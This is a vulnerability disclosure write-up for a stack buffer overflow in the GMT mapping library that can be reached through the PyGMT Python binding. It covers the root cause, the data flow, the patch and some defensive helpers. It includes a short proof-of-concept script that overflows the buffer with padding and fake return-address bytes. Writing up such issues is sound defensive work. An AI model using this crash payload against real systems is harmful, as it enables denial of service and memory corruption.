Original advisory (GHSA): https://github.com/GenericMappingTools/gmt/security/advisories/GHSA-fqxx-62x7-9gwg

TL;DR

A stack-based buffer overflow in GMT's gmt_remote_dataset_id() function can be triggered through PyGMT by supplying an oversized argument. The overflow corrupts stack memory and, depending on the environment, may lead to Remote Code Execution (RCE).

Overview

While analyzing Generic Mapping Tools (GMT) and its Python binding PyGMT, I discovered a stack-based buffer overflow vulnerability.

The issue is caused by a strcpy call without bounds checking in a C-level function. Because PyGMT passes user input directly into GMT internals, the vulnerability is externally reachable.

Vulnerability Information

  • Type: Stack Buffer Overflow → Potential RCE
  • CWE: CWE-121 (Stack-based Buffer Overflow)
  • Affected Version: 6.6.0
  • Root Cause: Unsafe strcpy usage

Background

Initially, I reported an SSRF issue in PyGMT. However, the maintainers clarified that URL handling is an intended feature inherited from GMT's design.

This response led to a key realization:

If input is intentionally unrestricted at the Python layer, the real attack surface likely exists in the underlying C library.

So I shifted the analysis target from PyGMT to GMT itself.

Discovery Process

The investigation focused on how user input flows through PyGMT into GMT.

The key entry point:

Session.call_module()

This method forwards its arguments directly to the GMT C API.

Hypothesis

"What happens if we pass an extremely long string?"

Test Payload

padding = "A" * 4096

Result

  • The program crashed with a segmentation fault
  • AddressSanitizer reported a stack-buffer-overflow

Further code review identified the vulnerable function:

gmt_remote_dataset_id()

Root Cause

The vulnerability originates from unsafe memory handling:

char file[PATH_MAX];
strcpy(file, input);

Problem

  • input is user-controlled
  • No length validation
  • Fixed-size stack buffer

Result

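If input is PATH_MAX bytes or longer (strcpy also writes the terminating NUL):

  • Memory past the end of file is overwritten
  • Adjacent stack data, including the saved return address, can be corrupted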
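
To make the arithmetic concrete, here is a minimal sketch that counts how many bytes strcpy would write past the end of the buffer for a given payload length. It assumes PATH_MAX is 4096 (the usual Linux value) and models only the simplified copy shown above, not the full GMT function; bytes_past_buffer is a name made up for illustration.

```python
ASSUMED_PATH_MAX = 4096  # assumption: typical Linux value, may differ elsewhere


def bytes_past_buffer(payload_len, bufsize=ASSUMED_PATH_MAX):
    """Return how many bytes land beyond a bufsize-byte buffer.

    Models strcpy(file, input): payload_len bytes plus one terminating NUL.
    """
    written = payload_len + 1  # strcpy copies the NUL terminator too
    return max(0, written - bufsize)


print(bytes_past_buffer(4095))        # 0: the longest input that still fits
print(bytes_past_buffer(4096))        # 1: only the NUL spills over
print(bytes_past_buffer(4096 + 800))  # 801
```

Under these assumptions, even a payload of exactly 4096 characters is already one byte too long.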

Data Flow

User Input (PyGMT)
    ↓
Session.call_module()
    ↓
GMT module ("which")
    ↓
gmt_remote_dataset_id()
    ↓
strcpy() → stack buffer overflow

The critical issue is that no layer validates the length of the input.
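
As an illustration of what a check at the Python layer could look like, here is a rough sketch. check_module_args is a hypothetical helper, not part of PyGMT, and the limit assumes PATH_MAX is 4096. It only narrows the path shown above and is no substitute for fixing the C code.

```python
ASSUMED_PATH_MAX = 4096  # assumption: typical Linux value


def check_module_args(args, limit=ASSUMED_PATH_MAX - 1):
    """Raise ValueError if any argument is longer than `limit` bytes.

    Hypothetical helper for illustration; not a PyGMT API.
    """
    for arg in args:
        size = len(arg.encode("utf-8"))  # the C side sees bytes, not code points
        if size > limit:
            raise ValueError(f"argument of {size} bytes exceeds limit of {limit}")
    return list(args)
```

A caller would wrap the argument list before handing it over, for example lib.call_module("which", check_module_args([user_input])).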

Exploitation

PoC

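import struct

from pygmt.clib import Session

with Session() as lib:
    # Filler sized to PATH_MAX as commonly defined on Linux (4096).
    padding = "A" * 4096
    # 100 copies of an 8-byte little-endian value intended to overwrite the return address.
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    # latin-1 decodes each byte to one character; 0x41 is plain ASCII "A".
    payload = padding + fake_ret.decode("latin-1")
    # The "which" module passes the name on to gmt_remote_dataset_id().
    lib.call_module("which", [payload])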

Result

Segmentation fault
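
Because the crash takes the whole interpreter down, it is convenient to run a PoC like this in a child process and inspect how it ended. The following is a rough sketch using only the standard library. run_isolated is a hypothetical helper name, and the negative-return-code convention it relies on applies to POSIX systems.

```python
import signal
import subprocess
import sys


def run_isolated(snippet, timeout=60):
    """Run a Python snippet in a child interpreter and describe how it ended."""
    proc = subprocess.run(
        [sys.executable, "-c", snippet],
        capture_output=True,
        timeout=timeout,
    )
    if proc.returncode < 0:
        # POSIX: a return code of -N means the child was killed by signal N.
        return "killed by " + signal.Signals(-proc.returncode).name
    return f"exited with status {proc.returncode}"


print(run_isolated("print('ok')"))              # exited with status 0
print(run_isolated("import sys; sys.exit(3)"))  # exited with status 3
```

On an affected build I would expect a signal name rather than an exit status when the PoC source is passed as the snippet. Sanitizer builds may report the failure differently.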

AddressSanitizer Output

ERROR: AddressSanitizer: stack-buffer-overflow
Function: gmt_remote_dataset_id

This confirms that the crash is caused by an out-of-bounds write to stack memory.

Impact

Direct Impact

  • Application crash (DoS)
  • Memory corruption

Advanced Impact

  • Control flow hijacking
  • Return address overwrite
  • Potential Remote Code Execution (RCE)

Stack-based overflows are especially dangerous when mitigations such as stack canaries and ASLR are missing or the memory layout is otherwise predictable.

Attack Surface

This vulnerability is exploitable in:

  • Applications using PyGMT
  • Systems passing user input into GMT modules
  • Automated geospatial data pipelines

Because the entry point is a Python string argument, reaching the vulnerable code requires no binary-level access, which makes exploitation easier than attacking a C program directly.

Bypass Analysis

This is not a logic bypass — it is a missing validation issue.

Observed problems:

  • Use of strcpy (no bounds check)
  • No input length validation
  • No defensive programming

Patch Analysis

The vulnerability was fixed by replacing the unbounded copy with a bounded one.

Before

strcpy(file, input);

After

strncpy(file, input, sizeof(file) - 1);
file[sizeof(file) - 1] = '\0';

Key Improvements

  • Bounds the copy to the size of the buffer
  • Prevents the buffer overflow
  • Ensures null termination

This patch removes the out-of-bounds write.
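
One side effect is worth noting: a strncpy-based copy like this silently truncates over-long input rather than rejecting it. The sketch below models that behaviour in Python with a deliberately tiny buffer. bounded_copy is an illustrative stand-in for the C code, not GMT's implementation.

```python
def bounded_copy(src: bytes, bufsize: int) -> bytes:
    """Model strncpy(dst, src, bufsize - 1) plus an explicit NUL terminator.

    Returns the bytes that end up in the buffer before the terminating NUL.
    """
    end = src.find(b"\x00")  # a C string stops at its first NUL byte
    if end != -1:
        src = src[:end]
    return src[: bufsize - 1]  # at most bufsize - 1 bytes are kept


BUF = 8  # small stand-in for PATH_MAX so the effect is easy to see
print(bounded_copy(b"short", BUF))          # b'short'
print(bounded_copy(b"much-too-long", BUF))  # b'much-to'
```

Whether truncating or rejecting is preferable depends on the caller. For file names, a truncated value may refer to a different file than the one requested.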

Why This Matters

This vulnerability highlights a critical misconception:

"High-level languages make things safe."

In reality:

  • Python → passes input directly
  • C → executes unsafe memory operations

This creates a hidden attack surface where safe-looking APIs expose unsafe internals.

Key Insight

High-level interfaces do not eliminate low-level vulnerabilities — they expose them.

Conclusion

This case demonstrates how a classic memory safety issue in C can become externally exploitable through modern language bindings.

Although it may initially appear as a crash-level bug, its impact can escalate significantly depending on runtime conditions.

Contribution

  • Identified stack-based buffer overflow in GMT
  • Demonstrated crash via PyGMT interface
  • Confirmed memory corruption with ASan
  • Analyzed root cause and patch
